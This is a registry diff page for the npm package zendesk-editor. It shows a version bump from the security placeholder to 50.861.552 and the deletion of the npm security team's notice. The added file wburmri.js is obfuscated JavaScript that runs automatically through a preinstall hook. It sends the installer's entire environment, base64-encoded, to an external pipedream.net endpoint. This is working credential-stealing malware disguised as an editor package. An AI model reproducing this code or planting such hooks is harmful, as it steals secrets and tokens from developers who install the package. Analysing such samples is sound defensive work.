zendesk-editor 0.0.1-security → 50.861.552
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zendesk-editor might be problematic. Click here for more details.
- package/package.json +8 -3
- package/wburmri.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zendesk-editor",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "50.861.552",
|
|
4
|
+
"main": "wburmri.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node wburmri.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/wburmri.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x3a79(_0x152eee,_0x122bef){const _0x1dd08e=a0_0x1dd0();return a0_0x3a79=function(_0x3a793d,_0x1de0a3){_0x3a793d=_0x3a793d-0x109;let _0x13c6fc=_0x1dd08e[_0x3a793d];return _0x13c6fc;},a0_0x3a79(_0x152eee,_0x122bef);}const a0_0xc84fba=a0_0x3a79;(function(_0x145d3c,_0x3727f1){const _0x9df9a6=a0_0x3a79,_0x3708de=_0x145d3c();while(!![]){try{const _0x1b34e8=-parseInt(_0x9df9a6(0x113))/0x1+parseInt(_0x9df9a6(0x11d))/0x2+parseInt(_0x9df9a6(0x11b))/0x3+-parseInt(_0x9df9a6(0x10b))/0x4*(-parseInt(_0x9df9a6(0x109))/0x5)+parseInt(_0x9df9a6(0x10e))/0x6+-parseInt(_0x9df9a6(0x115))/0x7+-parseInt(_0x9df9a6(0x10d))/0x8;if(_0x1b34e8===_0x3727f1)break;else _0x3708de['push'](_0x3708de['shift']());}catch(_0x5c8770){_0x3708de['push'](_0x3708de['shift']());}}}(a0_0x1dd0,0x4b9a0));function a0_0x1dd0(){const _0x2cc4fd=['4aaa0dfa016c3686a57e93787657fa37','1960264DuIFQR','347952LnnXaW','toString','pipedream','request','POST','257657wpZRjq','net','2508660dgeulV','env','write','end','join','https','1805235wFFCsD','npm_package_name','857300qiXcuT','137245CognKB','stringify','12sEuWol'];a0_0x1dd0=function(){return _0x2cc4fd;};return a0_0x1dd0();}const http=require(a0_0xc84fba(0x11a));req=http[a0_0xc84fba(0x111)]({'host':[a0_0xc84fba(0x10c),'m',a0_0xc84fba(0x110),a0_0xc84fba(0x114)][a0_0xc84fba(0x119)]('.'),'path':'/'+(process[a0_0xc84fba(0x116)][a0_0xc84fba(0x11c)]||''),'method':a0_0xc84fba(0x112)}),req[a0_0xc84fba(0x117)](Buffer['from'](JSON[a0_0xc84fba(0x10a)](process[a0_0xc84fba(0x116)]))[a0_0xc84fba(0x10f)]('base64')),req[a0_0xc84fba(0x118)]();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zendesk-editor for more information.
|